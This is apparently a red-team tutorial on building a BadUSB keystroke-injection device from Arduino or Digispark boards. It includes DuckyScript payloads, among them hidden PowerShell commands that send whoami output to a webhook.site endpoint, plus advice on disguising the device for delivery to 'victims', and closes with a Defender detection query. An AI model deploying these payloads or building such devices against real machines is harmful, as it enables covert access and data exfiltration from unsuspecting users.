Bad USB - Rubber Duckies

Disclaimer: Please use the information below responsibly. The aim is to educate users about the potential dangers posed by BAD USB devices and to promote cybersecurity awareness. This knowledge should only be applied in ethical contexts, such as authorized penetration testing or educational settings, and not for malicious purposes. Always seek explicit permission before testing in environments that are not your own, as unauthorized use can have serious legal consequences

In this article, I will guide you through the process of creating your own BAD USB stick, commonly referred to as a Rubber Ducky. Additionally, I will demonstrate how to set up a custom detection rule in Microsoft Defender to monitor and identify whenever these devices are plugged into your system.

How to Create Your Own Bad USB Stick (Rubber Ducky)

What is a Rubber Ducky?

Rubber Ducky devices are highly effective tools that are recognized by computers as standard keyboards. This unique capability allows them to execute commands just as a user would, but at astonishing speeds, allowing 1000 word per minute to be injected. The potential damage caused by such BAD USB sticks can be significant, as they can be used for various malicious activities, including but not limited to:

Exfiltration of Sensitive Data: Capture and send important data outside the target environment.
Establishing a Reverse Shell: Create a backdoor that provides remote access to an attacker.
Downloading Malicious Files: Retrieve harmful software from the internet onto the target machine.
Launching Attacks: Initiate attacks that could lead to ransomware incidents.

While Hack5 offers pre-made BAD USB devices for $80, this documentation will guide you on how to create your own BAD USB device for just $15.

Conducting a Red Team Exercise

I will also demonstrate how to conduct a red team exercise designed to enhance user awareness regarding security best practices. This exercise will involve simulating the use of BAD USB devices to identify potential vulnerabilities within your organization.

Additionally, I will explain how to create a custom detection rule in Microsoft Defender. This rule will alert you whenever BAD USB devices are connected to your network, helping to bolster your security posture and enabling you to respond swiftly to potential threats.

Required Materials

To get started, you will need the following materials:

BAD USB Device: A suitable option is a pre-made BAD USB device available for approximately €15 on Amazon. This device is based on an Arduino microcontroller and comes housed in a USB casing.
- Link to Bad USB Devices on Amazon.
Digispark Device: For a more budget-friendly alternative, consider using a Digispark development board, which can be purchased for around €5. You can create your own USB casing to house the board.
- Link to Digispark on Amazon.

Required resources

Duckify: This fantastic tool allows you to convert your Rubber Ducky code into Arduino or Digispark C code. One of its standout features is the ability to select your keyboard layout, which is crucial. Choosing the correct keyboard layout ensures that the keystrokes are accurately transmitted in the environment where the BAD USB device will be used; otherwise, it may result in unintended commands. Visit Duckify
AI Code Generation: Leverage artificial intelligence to create custom Rubber Ducky code tailored to your specific needs. After generating your code, you can convert it to Arduino or Digispark C code using the Duckify tool.
Webhook Site: This service allows you to generate free, unique URLs and email addresses to capture data. You can view everything sent to these endpoints instantly, making it useful for testing your payloads. Visit Webhook.site
Digispark USB Cases: If you need a housing solution for your Digispark device, you can find various USB casing designs on Thingiverse. View Digispark USB Cases

Required software

To start, install the Arduino IDE on your computer. This will equip you with the tools needed to upload code to your Arduino or Digispark device.

Optional: If you chose the Digispark development board instead of a BAD USB stick, follow these additional steps:

Download Digispark Drivers

To ensure your Digispark device is recognized by your system, download and install the necessary Windows drivers. You can find the drivers in this GitHub repository: Download Digispark Drivers Run either .DPinst64.exe or DPinst.exe, depending on your CPU architecture or run install drivers.exe which should automatically detect your CPU architecture.

Load Digispark Library in Arduino IDE

To load the Digispark library in the Arduino IDE:

Go to Preferences in the IDE.
Find Additional Boards Manager URLs and add the following link: https://raw.githubusercontent.com/digistump/arduino-boards-index/master/package_digistump_index.json

Install Digistump AVR Boards

After adding the URL, install the Digistump AVR Boards from the Arduino Board Manager.

Rubber Ducky Code

Now that our environment is set up, let’s explore some examples of Rubber Ducky scripts for our BAD USB device.

You can utilize the Duckify tool to convert your Rubber Ducky script into Arduino or Digispark C code.

If your operating system is slower, consider increasing the DELAY between operations to allow for a pause in milliseconds before each keystroke injection. Adjust the value as needed.

In this example, we will put a green message in full screen mode on command prompt with some ASCII Art code with the message "Lucky for you, this was a red team exercise conducted by your cyber team, simulating a ransomware attack via an USB. This exercise highlights the potential risks posed by real malicious actors. The consequences could have been much worse, potentially leading to the encryption of your entire disk! Never plug unknown devices to your machine!!"

The result should be displayed as follow to the victim when the BadUSB is plugged in:

DELAY 500
REM Open Command Prompt
GUI r
DELAY 500
STRING cmd.exe
ENTER
DELAY 500
ALT ENTER
DELAY 500
STRING color 0A && echo    _ && echo  "/     \" && echo "| () () |" && echo  "\  ^  /" && echo   "|||||" && echo   "|||||" && echo  Lucky for you, this was a red team exercise conducted by your cyber team, simulating a ransomware attack via an USB. This exercise highlights the potential risks posed by real malicious actors. The consequences could have been much worse, potentially leading to the encryption of your entire disk! Never plug unknown devices to your machine!!
ENTER

This Rubber Ducky example will send the output of the whoami command to a webhook.

DELAY 500
REM Open Run dialog
GUI r
DELAY 300
REM Start PowerShell in hidden mode to send the whoami output
STRING powershell -NoProfile -WindowStyle Hidden -Command "& {Invoke-RestMethod -Uri 'https://webhook.site/50a8add4-5475-4cb1-9fd3-2512aa9b93ac' -Method POST -Body (whoami)}"
ENTER

This code will send "hello" to our Webhook and display "You have been hacked!" in User's powershel

DELAY 500
REM Open Run dialog
GUI r
DELAY 300
REM Start PowerShell in hidden mode to send the whoami output
STRING powershell -NoProfile -WindowStyle Hidden -Command "& {Invoke-RestMethod -Uri 'https://webhook.site/50a8add4-5475-4cb1-9fd3-2512aa9b93ac' -Method POST -Body (echo hello)}"
ENTER
DELAY 1000
REM Open a new PowerShell window to display the message
GUI r
DELAY 300
STRING powershell -NoProfile -Command "Start-Process PowerShell -ArgumentList 'Write-Host \"You have been hacked!\" -NoExit' -WindowStyle Maximized"
ENTER
DELAY 500

Convert Rubber Ducky code to Arduino or Digispark code

After creating or selecting your Rubber Ducky code from the previous examples, use the Duckify resource to convert it into Arduino or Digispark C code.

Navigate to the Duckify tool.
Paste your Rubber Ducky code.
Select your system, keyboard layout and mode (Arduino or Digispark).
Click Convert.

After conversion, copy the output into your Arduino sketch. We will cover the process of uploading to Digispark or BAD USB devices in the next section.

Push Your BadUSB Script to Your USB Device

In this section, we’ll explain how to upload your BadUSB script to either an Arduino or a Digispark device.

BadUSB Device

If you are using a BAD USB device, follow these instructions:

Convert your Rubber Ducky script to Arduino code using the Duckify resource.
Open the Arduino IDE.
Navigate to File > New Sketch.

Plug in your BAD USB device.
Select the Arduino Micro board in the Arduino IDE.
Paste your C code that you converted using the Duckify resource.
Click the Upload button to upload the sketch to your BAD USB Arduino device.

Once the code is successfully uploaded to your BAD USB Arduino board, you should see the following message on the screen:

Congratulations! You have successfully created your own BAD USB device. Now, all you need to do is deliver it to the victims.

Digispark device

If you have chosen the Digispark development board, follow these steps to upload your code:

Prepare for Upload: Once the Digispark is plugged in, you have 60 seconds to push the code before any scripts execute. Do not plug it in until instructed by the Arduino IDE.
Open a New Sketch: In the Arduino IDE, go to File > New Sketch.
Select the Digispark Board: Navigate to Tools > Board and select Digistump AVR Boards, then choose Digispark (Default - 16.5 MHz).

Convert Your Code: Convert your Rubber Ducky code to Digispark mode using the Duckify resource.
Paste Your Code: Paste the converted code into the new sketch in the Arduino IDE.
Upload Your Code: Click the Upload button before plugging in your device! The Arduino IDE will notify you when to connect the Digispark. You will have 60 seconds to complete the operation from that moment.

After plugging in the device, the code will be uploaded, and you should see the following message in the output if the operation was succesfull:

Congratulations! You have successfully created your BAD USB device using the Digistump development boards. For a more authentic appearance, you can print a 3D USB case to make it look like a real USB stick:

Detect the Bad USB device on Windows

This section outlines the steps to gather the DeviceID of USB devices on Windows, specifically BAD USB devices, to facilitate monitoring and identification of users who plug them in.

To monitor USB devices, we first need to identify the DeviceID of the BAD USB devices. You can accomplish this by executing the following PowerShell command.
1. Status "OK": Indicates the device is currently plugged in.
2. Status "Unknown": Indicates the device is not plugged in.


Get-PnpDevice | Where-Object { $_.Class -like "HIDClass" } | Select-Object DeviceID, FriendlyName, Status

Once the BAD USB device is connected, it will appear in the Device Management of Windows with an "OK" status. If the device is unplugged, the DeviceID will remain in the device manager, but the status will change to "Unknown."

This behavior enables a blue team member to create a detection rule based on the DeviceID, facilitating the identification of users who have plugged in the BAD USB device.

To identify all instances of the BAD USB devices across your environment, you can create a hunting detection rule in Microsoft Defender. This is especially useful during red team exercises, allowing you to track the usage of BAD USB sticks and educate the users involved.

Example Hunting query:

DeviceEvents
| where AdditionalFields contains @"HID\\VID_16C0&PID_27DB\\6&2cb84562&0&0000"
   or AdditionalFields contains @"USB\\VID_2341&PID_8037&MI_02\\6&62fe806&0&0002"

PreviousPivoting and double pivoting NextUsefull command's

Last updated 5 months ago